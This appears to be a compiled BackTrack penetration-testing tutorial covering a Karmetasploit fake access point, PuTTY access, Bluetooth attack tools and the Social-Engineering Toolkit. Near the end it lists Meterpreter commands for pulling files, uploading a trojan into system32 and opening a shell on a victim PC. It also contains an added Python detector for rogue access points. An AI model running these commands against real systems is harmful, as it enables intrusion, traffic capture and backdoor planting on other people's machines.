Karmetasploit Attack Vector 

After configuration you are ready to run Karmetasploit and start an attack:
root@bt:~# cd /pentest/exploits/framework3/
root@bt:/pentest/exploits/framework3# msfconsole -r karma.rc 


The command will start Metasploit, and then the KARMA script starts to act as a fake AP and gives you a prompt like this:
msf auxiliary(http) >


When the victim starts using this AP, you are free to monitor all the activities and can record confidential information.
msf auxiliary(http) >
[*] DNS 10.0.0.100:1276 XID 87 (IN::A www.google.com)
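
Because a KARMA-style access point answers every probe request, a monitoring sensor can recognise it by what it answers for. The following is an added detection example, not part of Karmetasploit or of the original post; the observations, the authorized-BSSID inventory, the canary SSID (a random name the sensor probes for and no real AP should answer) and the threshold of 3 are constructed assumptions.

```python
from collections import defaultdict


def find_promiscuous_aps(probe_responses, authorized=None,
                         canary_ssids=(), max_ssids=3):
    """Flag BSSIDs whose probe responses look like an answer-everything AP.

    probe_responses: iterable of (bssid, ssid) pairs seen by a sensor.
    authorized:      {ssid: set of BSSIDs allowed to serve it}.
    canary_ssids:    random SSIDs the sensor probed for on purpose.
    """
    authorized = authorized or {}
    canaries = set(canary_ssids)
    ssids_by_bssid = defaultdict(set)
    for bssid, ssid in probe_responses:
        ssids_by_bssid[bssid.lower()].add(ssid)

    findings = {}
    for bssid, ssids in ssids_by_bssid.items():
        reasons = []
        # 1. Nothing legitimate serves an SSID the sensor made up.
        for ssid in sorted(ssids & canaries):
            reasons.append(f"answered canary SSID {ssid!r}")
        # 2. Enterprise APs typically use a separate BSSID per SSID, so one
        #    BSSID answering for many unrelated names is anomalous.
        if len(ssids) > max_ssids:
            reasons.append(f"answered for {len(ssids)} distinct SSIDs")
        # 3. A protected SSID served from a BSSID outside the inventory.
        for ssid in sorted(ssids):
            allowed = authorized.get(ssid)
            if allowed is not None and bssid not in allowed:
                reasons.append(
                    f"answered protected SSID {ssid!r} from an unlisted BSSID")
        if reasons:
            findings[bssid] = reasons
    return findings


# Constructed sensor observations.
AUTHORIZED = {
    "CorpWiFi": {"00:11:22:33:44:55"},
    "CorpGuest": {"00:11:22:33:44:56"},
}
CANARY = "zz-canary-7f3a9c"
OBSERVED = [
    ("00:11:22:33:44:55", "CorpWiFi"),
    ("00:11:22:33:44:56", "CorpGuest"),
    ("02:DE:AD:BE:EF:01", "CorpWiFi"),
    ("02:DE:AD:BE:EF:01", "HomeNet-4821"),
    ("02:DE:AD:BE:EF:01", "CoffeeShop"),
    ("02:DE:AD:BE:EF:01", "Airport_Free"),
    ("02:DE:AD:BE:EF:01", CANARY),
]

if __name__ == "__main__":
    for bssid, reasons in find_promiscuous_aps(
            OBSERVED, AUTHORIZED, [CANARY]).items():
        print(bssid, "->", "; ".join(reasons))
```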


Access Metasploit through PuTTY






When running a number of virtual machines simultaneously, the Windows machine can run short of memory, so we have to adopt some technique to avoid this situation.

A solution to this problem is to use PuTTY, as it is one of the most popular free SSH clients for Windows. We can easily connect a session to the Back|Track machine using PuTTY.


STEPS:

1- We will start our BackTrack virtual machine. Log in to the command line and execute either one of the following commands to start the secure shell service.

root@bt:~# /etc/init.d/ssh start
root@bt:~# start ssh

This starts the SSH process on the BackTrack machine. Find the IP address of the machine by entering the following command:

root@bt:~# ifconfig

Note down this IP address on your notepad :-)

2- Now start PuTTY on the host operating system. Enter the IP address (Host Name) of the Back|Track virtual machine and enter port 22.


Now click on Open to launch the command line. If the connection is successful, you will see the PuTTY command line functioning on behalf of the BackTrack machine. It will ask you to log in. Enter the credentials and enter ifconfig to check if the IP is the same as that of the virtual BackTrack.


BENEFITS:

In an SSH session we can interact with the BackTrack virtual machine using PuTTY. As the GUI of Back|Track is not loaded, it reduces the memory consumption by almost half. Minimizing the BackTrack virtual machine will further reduce memory consumption, as the Windows operating system provides less memory share to the processes that are minimized and provides faster execution of tasks.


BLUETOOTH HACKING - BACKTRACK


BLUETOOTH ANALYSIS IN BACKTRACK



Bluediving

Bluediving is a software suite specializing in Bluetooth penetration testing. Bluediving itself comprises several tools, such as Bluebug and BlueSnarf. Using these tools, Bluediving is able to provide a single platform for launching nearly every type of Bluetooth-based attack. Bluediving presents a simple, easy to use command line where the user is given the option of choosing attack targets, choosing attack methods, and even enumerating various Bluetooth devices discovered. The top level menu looks like this:


[MAIN MENU] menu: [a] Action [e] Exploit [i] Info [t] Tools

[1] Scan
[2] Scan and attack
[3] Scan and info
[4] Scan for...
[5] Add known device
[6] Change preferences
[7] Show preferences
[8] Show logfile
-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [x] Exit -


btscanner

btscanner is a utility used to gather as much information as possible from an unpaired Bluetooth device. It is specifically aimed at extracting information from unpaired devices, such as IEEE OUI numbers, and possible host identification. The below example shows how to use btscanner to scan for available Bluetooth devices.
Example Usage: btscanner

Enter ‘i’ to begin a scan for devices, and then ‘a’ to abort the scan once devices are found. Select the discovered device by pressing “Enter” to see more information about the target.


SET VIDEO TUTORIAL


SOCIAL ENGINEERING TOOLKIT TUTORIAL-BACKTRACK 5


Social engineering, also known as human hacking, is the act of manipulating the human mind to achieve desired goals. Social engineering is a general term, and in daily life everyone practices it, but the usage of social engineering in hacking and penetration testing is a little different. The main uses of social engineering in hacking are to get information, maintain access and so on.

There are various social engineering tips and tricks available on the Internet; besides these tips, there is a social engineering toolkit available for implementing computer-based social engineering attacks.


What Is Social Engineering Toolkit


In this article I will discuss the usage of the Social-Engineering Toolkit on BackTrack 5 to hack a Windows operating system, but before going to the actual tutorial I want to share a basic introduction to the toolkit that should really help beginners.
The Social-Engineering Toolkit (SET) is a Python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
The Social-Engineering Toolkit is available on BackTrack 5, BackBox, Blackbuntu, GnackTrack and other Linux distributions that are used for penetration testing.



If you are using some other Linux distribution, then use this command to get SET:
svn co http://svn.secmaniac.com/social_engineering_toolkit set/


Social Engineering Toolkit Tutorial

For this tutorial I am using BackTrack 5, and the tutorial will teach you a single method to own a computer by using SET, while more SET tutorials will be posted in later articles. For the best result I have made a video tutorial.


As I said in the video, more commands are in the article, so here are the necessary commands.


ps
The 'ps' command displays a list of running processes on the target.
meterpreter > ps

Download
meterpreter > download c:\\boot.ini

Upload
meterpreter > upload evil_trojan.exe c:\\windows\\system32

Execute
meterpreter > execute -f cmd.exe -i -H

shell

If you want to get the DOS screen of the victim PC for downloading, uploading your backdoor and other jobs, use shell.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
